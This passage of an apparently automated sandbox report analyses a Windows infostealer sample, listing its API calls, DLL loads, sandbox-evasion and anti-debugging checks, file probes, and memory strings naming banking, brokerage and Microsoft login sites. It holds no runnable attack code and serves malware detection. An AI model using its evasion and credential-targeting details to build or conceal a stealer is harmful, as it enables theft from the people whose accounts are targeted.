                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007DD5150_2_007DD515
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007E47750_2_007E4775
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007DBE090_2_007DBE09
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: String function: 007D0310 appears 51 times
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@1/0@1/2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeMutant created: \Sessions\1\BaseNamedObjects\1e7f31ac-1494-47cc-9633-054c20e7432e
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2224223067.000000000E144000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeReversingLabs: Detection: 42%
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127982661.000000000ADA3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF51000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B558000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2255987514.000000000F1FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E90E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127797796.000000000AD75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2178420804.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2114502255.000000000A360000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2112042713.000000000A0B8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2118866221.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156038090.000000000BDD8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B55D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF58000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E900000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntkrnlmp.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B558000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2255987514.000000000F1FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E90E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127797796.000000000AD75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2178420804.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156038090.000000000BDD8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ..pdbd source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2217953373.000000000DD83000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2232450057.000000000E65E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2249922214.000000000EF30000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2196463844.000000000D505000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2265708286.000000000F7B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2184249789.000000000CC2A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2133914078.000000000B291000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2124729580.000000000AB3E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2151669338.000000000BAFA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2162785923.000000000C3B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntkrnlmp.pdbx6 source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF51000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B558000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2255987514.000000000F1FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127797796.000000000AD75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2178420804.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2114502255.000000000A360000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2112042713.000000000A0B8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2118866221.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156038090.000000000BDD8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E900000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Desktop\projects\Release\BigProject.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188930924.000000000CFA6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Desktop\projects\Release\BigProject.pdb. source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_00775B80 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,InternetOpenA,FreeLibrary,_strlen,InternetOpenUrlA,FreeLibrary,task,InternetReadFile,FreeLibrary,task,0_2_00775B80
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007D004B push ecx; ret 0_2_007D005E

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-145931
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007E24BD FindFirstFileExW,0_2_007E24BD
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F1000 FindFirstFileW,FindNextFileW,EnterCriticalSection,LeaveCriticalSection,0_2_038F1000
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F4E27 FindFirstFileW,EnterCriticalSection,LeaveCriticalSection,FindNextFileW,0_2_038F4E27
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F1D3C FindFirstFileW,FindNextFileW,0_2_038F1D3C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F40BA FindFirstFileW,FindNextFileW,0_2_038F40BA
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F3EFC FindFirstFileW,FindNextFileW,0_2_038F3EFC
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_038F2054 GetCurrentHwProfileA,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,0_2_038F2054
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Adobe\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2115590508.000000000A431000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.co..microsoft.visualstudio.comVMware20,11696492231x
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.00000000012B0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.000000000124E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.0000000001290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                  Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2031236911.000000000A831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007D4383 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007D4383
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_00775B80 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,InternetOpenA,FreeLibrary,_strlen,InternetOpenUrlA,FreeLibrary,task,InternetReadFile,FreeLibrary,task,0_2_00775B80
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007E5891 GetProcessHeap,0_2_007E5891
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007D4383 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007D4383
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007D0495 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007D0495
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007D0622 SetUnhandledExceptionFilter,0_2_007D0622
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007D06F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007D06F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: 0_2_007D013C cpuid 0_2_007D013C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: EnumSystemLocalesW,0_2_007E5051
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_007E50DC
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: GetLocaleInfoW,0_2_007DE096
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: GetLocaleInfoW,0_2_007E532F
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_007E5458
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: GetLocaleInfoW,0_2_007E555E
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_007E5634
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeCode function: EnumSystemLocalesW,0_2_007DDBC7
